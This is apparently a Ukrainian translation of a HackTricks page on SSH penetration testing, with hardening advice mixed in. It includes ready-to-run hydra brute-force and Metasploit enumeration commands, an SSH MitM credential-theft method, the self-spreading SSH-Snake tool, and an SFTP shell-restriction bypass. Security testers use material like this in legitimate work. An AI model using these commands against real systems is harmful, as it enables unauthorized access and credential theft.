Підказка щодо багів у винагороду: зареєструйтеся на Intigriti, преміальній платформі для багів, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні та почніть заробляти винагороди до $100,000!

Register - IntigritiRegister - Intigriti

Основна інформація

SSH (Secure Shell або Secure Socket Shell) - це мережевий протокол, який забезпечує безпечне підключення до комп'ютера через незахищену мережу. Це важливо для збереження конфіденційності та цілісності даних при доступі до віддалених систем.

Порт за замовчуванням: 22

22/tcp open  ssh     syn-ack

SSH сервери:

• openSSH – OpenBSD SSH, встановлений в BSD, дистрибутивах Linux та Windows починаючи з Windows 10

• Dropbear – реалізація SSH для середовищ з обмеженими ресурсами пам'яті та процесора, встановлена в OpenWrt

• PuTTY – реалізація SSH для Windows, клієнт часто використовується, але використання сервера рідше

• CopSSH – реалізація OpenSSH для Windows

Бібліотеки SSH (реалізація на стороні сервера):

• libssh – багатоплатформена бібліотека на мові програмування C, що реалізує протокол SSHv2 з прив'язками до Python, Perl та R; використовується KDE для sftp та GitHub для інфраструктури git SSH

• wolfSSH – бібліотека сервера SSHv2, написана на мові ANSI C та призначена для вбудованих систем, операційних систем реального часу та ресурсозберігаючих середовищ

• Apache MINA SSHD – бібліотека Apache SSHD java, що базується на Apache MINA

• paramiko – бібліотека протоколу Python SSHv2

Перелічення

Захоплення банера

nc -vn <IP> 22

Автоматизована перевірка ssh-audit

ssh-audit - це інструмент для аудиту конфігурації сервера та клієнта ssh.

https://github.com/jtesta/ssh-audit є оновленою версією від https://github.com/arthepsy/ssh-audit/

Особливості:

• Підтримка сервера протоколу SSH1 та SSH2;

• аналіз конфігурації клієнта SSH;

• отримання банера, визначення пристрою або програмного забезпечення та операційної системи, виявлення стиснення;

• збір алгоритмів обміну ключами, хост-ключів, шифрування та кодів аутентифікації повідомлень;

• виведення інформації про алгоритми (доступні з моменту, видалені/вимкнені, небезпечні/слабкі/старі);

• рекомендації щодо алгоритмів (додавання або видалення на основі визнаної версії програмного забезпечення);

• виведення інформації про безпеку (пов'язані проблеми, призначений список CVE тощо);

• аналіз сумісності версій SSH на основі інформації про алгоритми;

• історична інформація від OpenSSH, Dropbear SSH та libssh;

• працює на Linux та Windows;

• немає залежностей

usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>

Публічний ключ SSH сервера

ssh-keyscan -t rsa <IP> -p <PORT>

Слабкі алгоритми шифрування

Це виявляється за замовчуванням за допомогою nmap. Але ви також можете використовувати sslscan або sslyze.

Сценарії Nmap

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

• ssh

Brute force usernames, passwords and private keys

Перелік імен користувачів

У деяких версіях OpenSSH ви можете здійснити атаку з використанням часу для переліку користувачів. Ви можете використовувати модуль metasploit для експлуатації цього:

msf> use scanner/ssh/ssh_enumusers

Brute force

Деякі загальні ssh облікові дані тут та тут та нижче.

Приватний ключ Brute Force

Якщо ви знаєте деякі ssh приватні ключі, які можна використовувати... спробуйте це. Ви можете використовувати nmap скрипт:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Або MSF допоміжний модуль:

msf> use scanner/ssh/ssh_identify_pubkeys

Або скористайтеся ssh-keybrute.py (нативний python3, легкий та має увімкнені застарілі алгоритми): snowdroppe/ssh-keybrute.

Відомі погані ключі можна знайти тут:

ssh-badkeys/authorized at master · rapid7/ssh-badkeysGitHub

Слабкі SSH ключі / Передбачуваний PRNG Debian

Деякі системи мають відомі дефекти в випадковому насінні, яке використовується для генерації криптографічного матеріалу. Це може призвести до драматичного зменшення простору ключів, який можна перебрати. Передгенеровані набори ключів, згенеровані на системах Debian, які постраждали від слабкого PRNG, доступні тут: g0tmi1k/debian-ssh.

Вам слід переглянути це, щоб шукати дійсні ключі для машини жертви.

Kerberos

crackmapexec, використовуючи протокол ssh, може використовувати опцію --kerberos для аутентифікації через kerberos. Для отримання додаткової інформації запустіть crackmapexec ssh --help.

За замовчуванням Логіни та Паролі

SSH-MitM

Якщо ви знаходитесь в локальній мережі як жертва, яка збирається підключитися до сервера SSH за допомогою імені користувача та пароля, ви можете спробувати виконати атаку MitM, щоб вкрасти ці облікові дані:

Шлях атаки:

• Перенаправлення трафіку: Атакуючий відхиляє трафік жертви на свій комп'ютер, ефективно перехоплюючи спробу підключення до сервера SSH.

• Перехоплення та Логування: Комп'ютер атакуючого діє як проксі, захоплюючи дані входу користувача, претендуючи на легітимний сервер SSH.

• Виконання команд та Реле: Нарешті, сервер атакуючого логує облікові дані користувача, пересилає команди на справжній сервер SSH, виконує їх та надсилає результати назад користувачеві, зроблячи процес здається безперервним та легітимним.

SSH MITM робить точно те, що описано вище.

Для захоплення виконання фактичного MitM ви можете використовувати техніки, такі як ARP-підроблення, DNS-підроблення або інші, описані в Атаках підроблення мережі.

SSH-Snake

Якщо ви хочете пройти мережу, використовуючи виявлені приватні ключі SSH на системах, використовуючи кожен приватний ключ на кожній системі для нових хостів, тоді SSH-Snake - це те, що вам потрібно.

SSH-Snake автоматично та рекурсивно виконує наступні завдання:

1. На поточній системі знаходить будь-які приватні ключі SSH,

2. На поточній системі знаходить будь-які хости або призначення (користувач@хост), на які можуть бути прийняті приватні ключі,

3. Намагається підключитися до всіх призначень, використовуючи всі виявлені приватні ключі,

4. Якщо підключення до призначення вдалося, повторює кроки #1 - #4 на підключеній системі.

Це повністю самореплікуюче та самопоширюючеся - і цілком безфайлове.

Неправильні налаштування конфігурації

Логін root

Зазвичай SSH-сервери дозволяють вхід користувачу root за замовчуванням, що становить значний ризик для безпеки. Вимкнення входу root є критичним кроком у забезпеченні безпеки сервера. Несанкціонований доступ з адміністративними привілеями та атаки методом грубої сили можна пом'якшити, внесши ці зміни.

Для вимкнення входу root в OpenSSH:

1. Редагування файлу конфігурації SSH за допомогою: sudoedit /etc/ssh/sshd_config

2. Змініть параметр з #PermitRootLogin yes на PermitRootLogin no.

3. Перезавантажте конфігурацію за допомогою: sudo systemctl daemon-reload

4. Перезапустіть сервер SSH, щоб застосувати зміни: sudo systemctl restart sshd

Груба сила SFTP

• Груба сила SFTP

Виконання команд SFTP

Є поширена помилка з налаштуваннями SFTP, коли адміністратори мають на увазі, що користувачі можуть обмінюватися файлами без увімкнення віддаленого доступу до оболонки. Незважаючи на те, що користувачі мають нінтерактивні оболонки (наприклад, /usr/bin/nologin) та обмеження на певний каталог, залишається безпекова дірка. Користувачі можуть обійти ці обмеження, запитуючи виконання команди (наприклад, /bin/bash) безпосередньо після входу, перш ніж їх призначена нінтерактивна оболонка візьме владу. Це дозволяє несанкціоноване виконання команд, підірвуючи задумані заходи безпеки.

Приклад звідси:

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Ось приклад безпечної конфігурації SFTP (/etc/ssh/sshd_config - openSSH) для користувача noraj:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no

Ця конфігурація дозволить лише SFTP: вимкнення доступу до оболонки шляхом примусового запуску команди та вимкнення доступу до TTY, а також вимкнення всіх видів перенаправлення портів або тунелювання.

Тунелювання SFTP

Якщо у вас є доступ до сервера SFTP, ви також можете тунелювати свій трафік через нього, наприклад, використовуючи звичайне перенаправлення портів:

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP Символічне посилання

SFTP має команду "symlink". Тому, якщо у вас є права на запис у деякій папці, ви можете створити символічні посилання на інші папки/файли. Оскільки ви, ймовірно, застрягли всередині chroot, це не буде особливо корисним для вас, але, якщо ви можете отримати доступ до створеного символічного посилання з сервісу без chroot (наприклад, якщо ви можете отримати доступ до символічного посилання через веб), ви можете відкрити файли, на які вказує символічне посилання через веб.

Наприклад, щоб створити символічне посилання на новий файл "froot" на "/":

sftp> symlink / froot

Якщо ви зможете отримати доступ до файлу "froot" через веб, ви зможете переглянути кореневу ("/") теку системи.

Методи аутентифікації

У високозахищених середовищах загальною практикою є ввімкнення лише аутентифікації на основі ключів або двофакторної аутентифікації замість простої аутентифікації на основі пароля. Але часто більш міцні методи аутентифікації вмикаються без вимкнення слабших. Частим випадком є ввімкнення publickey у конфігурації openSSH та встановлення його як методу за замовчуванням, але не вимикання password. Таким чином, використовуючи режим розгорнутого виводу клієнта SSH, зловмисник може побачити, що ввімкнено слабший метод:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Наприклад, якщо встановлено обмеження на кількість невдалих спроб аутентифікації і ви ніколи не маєте можливості досягти методу введення пароля, ви можете використати опцію PreferredAuthentications, щоб змусити використовувати цей метод.

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Перегляд конфігурації сервера SSH необхідний для перевірки того, що дозволені лише очікувані методи. Використання режиму verbose на клієнті може допомогти побачити ефективність конфігурації.

Файли конфігурації

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

• https://packetstormsecurity.com/files/download/71252/sshfuzz.txt

• https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2

References

• You can find interesting guides on how to harden SSH in https://www.ssh-audit.com/hardening_guides.html

• https://community.turgensec.com/ssh-hacking-guide

Підказка щодо багів: зареєструйтесь на Intigriti, преміальній платформі для пошуку багів, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні, і почніть заробляти винагороди до $100,000!

Автоматичні команди HackTricks

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'